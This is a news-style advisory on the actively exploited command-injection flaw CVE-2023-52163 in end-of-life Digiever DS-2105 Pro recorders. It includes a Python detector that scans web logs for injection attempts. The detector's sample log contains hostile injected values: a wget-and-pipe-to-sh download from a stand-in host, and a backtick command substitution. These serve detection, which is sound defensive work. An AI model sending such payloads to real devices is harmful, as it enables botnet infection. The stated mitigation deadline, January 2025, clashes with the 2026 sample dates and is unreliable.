The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity security flaw affecting Digiever DS-2105 Pro network video recorders (NVRs) to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation by threat actors.
About the Vulnerability
The flaw, tracked as CVE-2023-52163 with a CVSS score of 8.8, is a command-injection bug that gives an authenticated remote attacker code execution on the recorder. It is reached through the time_tzsetup.cgi endpoint, which lacks proper authorization checks: a crafted request to that endpoint is enough for attacker-supplied input to be executed as an operating-system command.
CISA warned:
“Digiever DS-2105 Pro contains a missing authorization vulnerability which could allow for command injection via time_tzsetup.cgi.”
Reports from Akamai and Fortinet indicate that the vulnerability has been actively exploited to deploy botnets, including Mirai and ShadowV2, highlighting the urgency of mitigation.
End-of-Life Devices and Additional Risks
Security researcher Ta-Lun Yen of TXOne Research noted that the DS-2105 Pro will not receive a fix because the device has reached end-of-life (EoL) status. A related flaw, CVE-2023-52164 (arbitrary file read, CVSS 5.1), also remains unresolved.
Exploitation requires the attacker to be logged in to the device and to send specially crafted requests. That is a weak barrier on an internet-exposed recorder that still uses default credentials, which is the usual entry point for Mirai-style botnets. With no patch forthcoming, such devices are highly susceptible to compromise.
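Since no patch exists, the practical response is to watch the recorder's web access logs for the attack pattern described above: requests to time_tzsetup.cgi whose parameters carry shell metacharacters. The detector below is an added example, not the vendor's code and not a reproduction of any observed campaign; only the endpoint name comes from the advisory. The parameter names (ntp, tz), the /cgi-bin/ path, the log format (a combined-style line with a trailing quoted POST body, as a reverse proxy in front of the NVR might log it) and the sample log lines are all constructed for illustration.

```python
"""Flag HTTP access-log entries that target the Digiever DS-2105 Pro
time_tzsetup.cgi endpoint with shell metacharacters in any parameter.

Added example for log-based detection; not the vendor's code. The log
format, parameter names and sample lines below are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Only the endpoint name is known from the advisory; the directory it lives
# in is not, so match on the path suffix rather than a full path.
ENDPOINT = "time_tzsetup.cgi"

# Characters a value needs in order to escape an argument that the CGI
# hands to a shell: separators, pipes, backticks and $( / ${ substitution.
SHELL_META = re.compile(r"[;&|`\n\r]|\$\(|\$\{")

# Combined-log-style line plus an optional trailing quoted field holding the
# POST body (hypothetical reverse-proxy log format, assumed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
    r'(?: "(?P<body>[^"]*)")?\s*$'
)


def suspicious_params(query: str) -> dict:
    """Return {name: decoded value} for every parameter containing shell
    metacharacters. parse_qsl percent-decodes, so %3B is caught as ';'."""
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SHELL_META.search(value):
            hits[name] = value
    return hits


def analyze_line(line: str):
    """Return a finding for a request to time_tzsetup.cgi that carries shell
    metacharacters in the query string or logged body, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith(ENDPOINT):
        return None
    hits = suspicious_params(url.query)
    if m["body"]:
        hits.update(suspicious_params(m["body"]))
    if not hits:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],
        "ts": m["ts"],
        "method": m["method"],
        "status": int(m["status"]),
        "params": hits,
    }


def scan(lines):
    """Run analyze_line over an iterable of log lines; return the findings."""
    return [f for f in (analyze_line(line) for line in lines) if f]


# Constructed sample log; the malicious payload shapes are generic
# command-injection forms, not a reproduction of any real campaign.
SAMPLE_LOG = [
    # Benign: an operator sets the NTP server through the UI.
    '203.0.113.5 - admin [10/Jan/2026:10:01:02 +0000] '
    '"POST /cgi-bin/time_tzsetup.cgi HTTP/1.1" 200 512 "ntp=pool.ntp.org&tz=UTC"',
    # Benign: metacharacters, but on an unrelated endpoint.
    '203.0.113.5 - admin [10/Jan/2026:10:02:11 +0000] '
    '"POST /cgi-bin/system.cgi HTTP/1.1" 200 128 "note=a;b"',
    # Malicious: URL-encoded separator and pipe smuggled into the ntp parameter.
    '198.51.100.77 - admin [10/Jan/2026:10:05:40 +0000] '
    '"GET /cgi-bin/time_tzsetup.cgi?ntp=1.2.3.4%3Bwget%20http%3A%2F%2F198.51.100.77%2Fx.sh%7Csh HTTP/1.1" 200 64',
    # Malicious: backtick command substitution in the POST body.
    '198.51.100.77 - admin [10/Jan/2026:10:06:03 +0000] '
    '"POST /cgi-bin/time_tzsetup.cgi HTTP/1.1" 200 64 "ntp=%60id%60&tz=UTC"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["ts"]} {finding["ip"]} user={finding["user"]} '
              f'{finding["method"]} status={finding["status"]} params={finding["params"]}')
```

Note that the two hits above are authenticated requests (user=admin) from an address other than the operator's; on a device where the attacker has to log in first, a new source address succeeding against the admin account is itself worth alerting on, independent of the payload.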
Recommended Mitigations
CISA advises affected users and Federal Civilian Executive Branch (FCEB) agencies to take the following actions:
- Avoid exposing the NVR to the internet
- Change default usernames and passwords
- Apply mitigations provided by the vendor or discontinue use of the device by January 12, 2025
Organizations that still operate DS-2105 Pro NVRs should implement these steps immediately; with the device unpatched and actively targeted, removing it from internet reach and retiring it are the only durable protections.